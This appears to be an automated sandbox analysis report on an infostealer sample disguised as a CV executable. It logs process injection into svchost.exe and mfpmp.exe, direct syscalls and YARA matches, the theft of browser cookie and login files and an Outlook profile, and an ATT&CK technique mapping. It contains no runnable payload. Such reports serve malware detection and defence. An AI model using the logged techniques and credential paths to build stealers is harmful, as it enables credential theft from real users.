            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A32582 mov ecx, dword ptr fs:[00000030h]3_2_03A32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A64588 mov eax, dword ptr fs:[00000030h]3_2_03A64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6E59C mov eax, dword ptr fs:[00000030h]3_2_03A6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03A5E5E7
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Code function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_004580A9
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Code function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A155
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Code function: 0_2_0042A124 SetUnhandledExceptionFilter,0_2_0042A124

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe NtOpenKeyEx: Indirect: 0x140077B9B
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtCreateFile: Direct from: 0x77752FEC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtOpenFile: Direct from: 0x77752DCC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtSetInformationThread: Direct from: 0x77752ECC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtQueryInformationToken: Direct from: 0x77752CAC
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe NtQueryValueKey: Indirect: 0x140077C9F
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtTerminateThread: Direct from: 0x77752FCC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtProtectVirtualMemory: Direct from: 0x77752F9C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtSetInformationProcess: Direct from: 0x77752C5C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtNotifyChangeKey: Direct from: 0x77753C2C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtOpenKeyEx: Direct from: 0x77752B9C
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe NtClose: Indirect: 0x140077E81
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtOpenSection: Direct from: 0x77752E0C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtTerminateThread: Direct from: 0x77747B2E
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtAllocateVirtualMemory: Direct from: 0x777548EC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtQueryVolumeInformationFile: Direct from: 0x77752F2C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtQuerySystemInformation: Direct from: 0x777548CC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtAllocateVirtualMemory: Direct from: 0x77752BEC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtDeviceIoControlFile: Direct from: 0x77752AEC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtCreateUserProcess: Direct from: 0x7775371C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtWriteVirtualMemory: Direct from: 0x7775490C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtQueryInformationProcess: Direct from: 0x77752C26
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtResumeThread: Direct from: 0x77752FBC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtReadVirtualMemory: Direct from: 0x77752E8C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtCreateKey: Direct from: 0x77752C6C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtSetInformationThread: Direct from: 0x77752B4C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtQueryAttributesFile: Direct from: 0x77752E6C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtAllocateVirtualMemory: Direct from: 0x77753C9C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtClose: Direct from: 0x77752B6C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtCreateMutant: Direct from: 0x777535CC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtWriteVirtualMemory: Direct from: 0x77752E3C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtMapViewOfSection: Direct from: 0x77752D1C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtResumeThread: Direct from: 0x777536AC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtReadFile: Direct from: 0x77752ADC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtQuerySystemInformation: Direct from: 0x77752DFC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtDelayExecution: Direct from: 0x77752DDC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe NtAllocateVirtualMemory: Direct from: 0x77752BFC
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\mfpmp.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\mfpmp.exe Section loaded: NULL target: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe protection: read write
            Source: C:\Windows\SysWOW64\mfpmp.exe Section loaded: NULL target: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\mfpmp.exe Section loaded: NULL target: unknown protection: read write
            Source: C:\Windows\SysWOW64\mfpmp.exe Section loaded: NULL target: unknown protection: execute and read and write
            Source: C:\Windows\SysWOW64\mfpmp.exe Thread register set: target process: 8936
            Source: C:\Windows\SysWOW64\mfpmp.exe Thread APC queued: target process: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: FD1008
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Code function: 0_2_004587B1 LogonUserW,0_2_004587B1
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00464C53 mouse_event,0_2_00464C53
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe"Jump to behavior
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeProcess created: C:\Windows\SysWOW64\mfpmp.exe "C:\Windows\SysWOW64\mfpmp.exe"
            Source: C:\Windows\SysWOW64\mfpmp.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00457CAF
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0045874B
            Source: CV_Sales Representative - Job Request PDF.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: 7EFPjTEjLAB4.exe, 00000017.00000000.1274632765.0000000001970000.00000002.00000001.00040000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000017.00000002.2438994124.0000000001971000.00000002.00000001.00040000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000026.00000002.2443146840.0000000001611000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: XProgram Manager
            Source: CV_Sales Representative - Job Request PDF.exe, 7EFPjTEjLAB4.exe, 00000017.00000000.1274632765.0000000001970000.00000002.00000001.00040000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000017.00000002.2438994124.0000000001971000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: 7EFPjTEjLAB4.exe, 00000017.00000000.1274632765.0000000001970000.00000002.00000001.00040000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000017.00000002.2438994124.0000000001971000.00000002.00000001.00040000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000026.00000002.2443146840.0000000001611000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: 7EFPjTEjLAB4.exe, 00000017.00000000.1274632765.0000000001970000.00000002.00000001.00040000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000017.00000002.2438994124.0000000001971000.00000002.00000001.00040000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000026.00000002.2443146840.0000000001611000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Code function: 0_2_0042862B cpuid 0_2_0042862B
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\AppVClient.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST8412.tmp VolumeInformation
            Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST8432.tmp VolumeInformation
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\perfhost.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\Spectrum.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\TieringEngineService.exe Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Code function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00434E87
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Code function: 0_2_00441E06 GetUserNameW,0_2_00441E06
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Code function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00433F3A
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0

            Stealing of Sensitive Information

            Source: Yara match File source: 00000003.00000002.1356343056.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.1351634880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000019.00000002.2445449912.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.1356486981.0000000003DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000026.00000002.2456798324.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000019.00000002.2410421915.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000019.00000002.2419943253.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000017.00000002.2445724285.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\mfpmp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\mfpmp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\mfpmp.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\mfpmp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\mfpmp.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\mfpmp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\mfpmp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\mfpmp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\mfpmp.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: CV_Sales Representative - Job Request PDF.exe Binary or memory string: WIN_81
            Source: CV_Sales Representative - Job Request PDF.exe Binary or memory string: WIN_XP
            Source: CV_Sales Representative - Job Request PDF.exe Binary or memory string: WIN_XPe
            Source: CV_Sales Representative - Job Request PDF.exe Binary or memory string: WIN_VISTA
            Source: CV_Sales Representative - Job Request PDF.exe Binary or memory string: WIN_7
            Source: CV_Sales Representative - Job Request PDF.exe Binary or memory string: WIN_8
            Source: CV_Sales Representative - Job Request PDF.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            Source: Yara match File source: 00000003.00000002.1356343056.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.1351634880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000019.00000002.2445449912.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.1356486981.0000000003DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000026.00000002.2456798324.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000019.00000002.2410421915.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000019.00000002.2419943253.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000017.00000002.2445724285.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Code function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00476283
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Code function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476747
            Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses, Network Security Appliances, Gather Victim Org Information
            Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure, Domains, DNS Server
            Initial Access: Valid Accounts (2), Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise, Compromise Software Dependencies and Development Tools, Compromise Software Supply Chain
            Execution: Native API (1), Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter, PowerShell, AppleScript, Windows Command Shell
            Persistence: LSASS Driver (2), DLL Side-Loading (1), Valid Accounts (2), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task
            Privilege Escalation: Exploitation for Privilege Escalation (1), Abuse Elevation Control Mechanism (1), LSASS Driver (2), DLL Side-Loading (1), Valid Accounts (2), Access Token Manipulation (21), Process Injection (412), Scheduled Task/Job, At, Cron, Launchd, Scheduled Task
            Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (1), Abuse Elevation Control Mechanism (1), Obfuscated Files or Information (3), Software Packing (1), Timestomp (1), DLL Side-Loading (1), Masquerading (222), Valid Accounts (2), Virtualization/Sandbox Evasion (2), Access Token Manipulation (21), Process Injection (412)
            Credential Access: OS Credential Dumping (1), Input Capture (21), Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing, Input Capture, Keylogging
            Discovery: System Time Discovery (12), Account Discovery (1), File and Directory Discovery (2), System Information Discovery (126), Security Software Discovery (251), Virtualization/Sandbox Evasion (2), Process Discovery (3), Application Window Discovery (11), System Owner/User Discovery (1), Network Service Discovery, System Network Connections Discovery, Process Discovery
            Lateral Movement: Taint Shared Content (1), Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot, Software Deployment Tools, Taint Shared Content
            Collection: Archive Collected Data (1), Data from Local System (1), Email Collection (1), Input Capture (21), Clipboard Data (3), GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging, Remote Data Staging, Screen Capture
            Command and Control: Ingress Tool Transfer (4), Encrypted Channel (1), Non-Application Layer Protocol (4), Application Layer Protocol (14), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols, Mail Protocols, DNS
            Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted Non-C2 Protocol, Exfiltration Over Physical Medium
            Impact: System Shutdown/Reboot (1), Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement, Firmware Corruption, Resource Hijacking
            Behavior Graph ID: 1638116 Sample: CV_Sales Representative - J... Startdate: 14/03/2025 Architecture: WINDOWS Score: 100
